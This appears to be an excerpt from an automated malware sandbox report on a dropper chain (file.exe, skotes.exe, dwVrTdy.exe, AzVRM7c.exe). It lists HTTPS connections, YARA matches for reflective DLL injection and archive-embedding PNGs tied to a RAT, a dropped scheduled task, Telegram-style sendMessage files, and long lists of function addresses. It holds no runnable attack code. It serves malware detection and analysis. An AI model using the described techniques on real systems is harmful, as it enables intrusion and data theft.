Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900

Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.10:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.10:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.10:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.10:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.10:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.10:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49909 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49920 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 44.2.firefox.exe.144aa0f0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 43.2.firefox.exe.2392c270000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 44.2.firefox.exe.144aa140000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 44.2.firefox.exe.144aa140000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 44.2.firefox.exe.144aa0f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 43.2.firefox.exe.2392c270000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 20.3.explorer.exe.d60a960.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 43.2.firefox.exe.2392dca0000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 20.0.explorer.exe.89a0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 20.3.explorer.exe.d60a960.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 20.0.explorer.exe.89a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 43.2.firefox.exe.2392dca0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000002C.00000002.2615996030.00000144AA140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000002B.00000002.2491500061.000002392DCA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000002B.00000002.2489426233.000002392C270000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000002C.00000002.2615892313.00000144AA0F0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000014.00000000.2216112963.00000000089A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\output[1].png, type: DROPPED	Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED	Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED	Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\output[1].png, type: DROPPED	Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: 602c785fe5.exe, 0000001B.00000002.2524820308.0000000000622000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_d8629f7f-1
Source: 602c785fe5.exe, 0000001B.00000002.2524820308.0000000000622000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_182f0e31-0

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[2].exe1.7.dr	Static PE information: section name:
Source: random[2].exe1.7.dr	Static PE information: section name: .idata
Source: random[2].exe1.7.dr	Static PE information: section name:
Source: d8d3046b98.exe.7.dr	Static PE information: section name:
Source: d8d3046b98.exe.7.dr	Static PE information: section name: .idata
Source: d8d3046b98.exe.7.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name: .idata
Source: random[1].exe.7.dr	Static PE information: section name:
Source: be08f59021.exe.7.dr	Static PE information: section name:
Source: be08f59021.exe.7.dr	Static PE information: section name: .idata
Source: be08f59021.exe.7.dr	Static PE information: section name:
Source: random[1].exe1.7.dr	Static PE information: section name:
Source: random[1].exe1.7.dr	Static PE information: section name: .idata
Source: 9774053d4c.exe.7.dr	Static PE information: section name:
Source: 9774053d4c.exe.7.dr	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\skotes.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00245C83	0_2_00245C83
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024735A	0_2_0024735A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00288860	0_2_00288860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00244DE0	0_2_00244DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00244B30	0_2_00244B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FF78BB	2_2_00FF78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FF8860	2_2_00FF8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FF7049	2_2_00FF7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FF31A8	2_2_00FF31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FB4B30	2_2_00FB4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FB4DE0	2_2_00FB4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FF2D10	2_2_00FF2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FF779B	2_2_00FF779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FE7F36	2_2_00FE7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FF78BB	3_2_00FF78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FF8860	3_2_00FF8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FF7049	3_2_00FF7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FF31A8	3_2_00FF31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FB4B30	3_2_00FB4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FB4DE0	3_2_00FB4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FF2D10	3_2_00FF2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FF779B	3_2_00FF779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FE7F36	3_2_00FE7F36
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F2B600	9_2_00007FF643F2B600
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F2E790	9_2_00007FF643F2E790
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F7E170	9_2_00007FF643F7E170
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F26190	9_2_00007FF643F26190
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F7D2C8	9_2_00007FF643F7D2C8
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F383F0	9_2_00007FF643F383F0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F5E440	9_2_00007FF643F5E440
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F25D60	9_2_00007FF643F25D60
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F35EC0	9_2_00007FF643F35EC0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F310F0	9_2_00007FF643F310F0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F26970	9_2_00007FF643F26970
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F2CA90	9_2_00007FF643F2CA90
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F29B00	9_2_00007FF643F29B00
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F27C50	9_2_00007FF643F27C50
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F33CE0	9_2_00007FF643F33CE0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F34D20	9_2_00007FF643F34D20
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F7D544	9_2_00007FF643F7D544
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F7A65C	9_2_00007FF643F7A65C
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F6A698	9_2_00007FF643F6A698
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F586C0	9_2_00007FF643F586C0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F8070C	9_2_00007FF643F8070C
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F55720	9_2_00007FF643F55720
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F83774	9_2_00007FF643F83774
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F217A0	9_2_00007FF643F217A0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F497C0	9_2_00007FF643F497C0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F29830	9_2_00007FF643F29830
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F2D8A6	9_2_00007FF643F2D8A6
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F718B8	9_2_00007FF643F718B8
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F4F910	9_2_00007FF643F4F910
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F50190	9_2_00007FF643F50190
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F321C0	9_2_00007FF643F321C0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F7A1C8	9_2_00007FF643F7A1C8
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F6B1E4	9_2_00007FF643F6B1E4
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F6A290	9_2_00007FF643F6A290
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F82298	9_2_00007FF643F82298
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F852F0	9_2_00007FF643F852F0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F583A0	9_2_00007FF643F583A0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F213D0	9_2_00007FF643F213D0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F5D410	9_2_00007FF643F5D410
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F6A494	9_2_00007FF643F6A494
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F2E4AA	9_2_00007FF643F2E4AA
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F73D40	9_2_00007FF643F73D40
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F7FDA0	9_2_00007FF643F7FDA0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F32EF0	9_2_00007FF643F32EF0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F70F30	9_2_00007FF643F70F30
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F51F30	9_2_00007FF643F51F30
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F6F004	9_2_00007FF643F6F004
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F21000	9_2_00007FF643F21000
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F48010	9_2_00007FF643F48010
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F29030	9_2_00007FF643F29030
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F72040	9_2_00007FF643F72040
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F21A20	9_2_00007FF643F21A20
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F4EA20	9_2_00007FF643F4EA20
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F7DAD4	9_2_00007FF643F7DAD4
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F6EAF8	9_2_00007FF643F6EAF8
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F74C10	9_2_00007FF643F74C10
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F56CB0	9_2_00007FF643F56CB0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F6ACDC	9_2_00007FF643F6ACDC
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F7ACDC	9_2_00007FF643F7ACDC
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F54D10	9_2_00007FF643F54D10
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F7ED1C	9_2_00007FF643F7ED1C
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF68456B600	11_2_00007FF68456B600
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF68456E790	11_2_00007FF68456E790
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684566190	11_2_00007FF684566190
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845BE170	11_2_00007FF6845BE170
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845BD2C8	11_2_00007FF6845BD2C8
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845783F0	11_2_00007FF6845783F0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF68459E440	11_2_00007FF68459E440
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684565D60	11_2_00007FF684565D60
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684575EC0	11_2_00007FF684575EC0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684566970	11_2_00007FF684566970
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF68456CA90	11_2_00007FF68456CA90
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684569B00	11_2_00007FF684569B00
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684567C50	11_2_00007FF684567C50
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684574D20	11_2_00007FF684574D20
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684573CE0	11_2_00007FF684573CE0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845BD544	11_2_00007FF6845BD544
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845AA698	11_2_00007FF6845AA698
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845BA65C	11_2_00007FF6845BA65C
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684595720	11_2_00007FF684595720
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845C070C	11_2_00007FF6845C070C
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845986C0	11_2_00007FF6845986C0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845617A0	11_2_00007FF6845617A0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845C3774	11_2_00007FF6845C3774
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684569830	11_2_00007FF684569830
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845897C0	11_2_00007FF6845897C0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF68456D8A6	11_2_00007FF68456D8A6
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF68458F910	11_2_00007FF68458F910
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845B18B8	11_2_00007FF6845B18B8
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684590190	11_2_00007FF684590190
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845AB1E4	11_2_00007FF6845AB1E4
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845721C0	11_2_00007FF6845721C0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845BA1C8	11_2_00007FF6845BA1C8
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845C2298	11_2_00007FF6845C2298
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845AA290	11_2_00007FF6845AA290
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845C52F0	11_2_00007FF6845C52F0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845983A0	11_2_00007FF6845983A0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF68459D410	11_2_00007FF68459D410
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845613D0	11_2_00007FF6845613D0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF68456E4AA	11_2_00007FF68456E4AA
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845AA494	11_2_00007FF6845AA494
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845BFDA0	11_2_00007FF6845BFDA0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845B3D40	11_2_00007FF6845B3D40
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845B0F30	11_2_00007FF6845B0F30
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684591F30	11_2_00007FF684591F30
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684572EF0	11_2_00007FF684572EF0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684569030	11_2_00007FF684569030
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845AF004	11_2_00007FF6845AF004
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684561000	11_2_00007FF684561000
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684588010	11_2_00007FF684588010
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845B2040	11_2_00007FF6845B2040
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845710F0	11_2_00007FF6845710F0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF68458EA20	11_2_00007FF68458EA20
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684561A20	11_2_00007FF684561A20
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845AEAF8	11_2_00007FF6845AEAF8
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845BDAD4	11_2_00007FF6845BDAD4
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845B4C10	11_2_00007FF6845B4C10
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684596CB0	11_2_00007FF684596CB0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845BED1C	11_2_00007FF6845BED1C
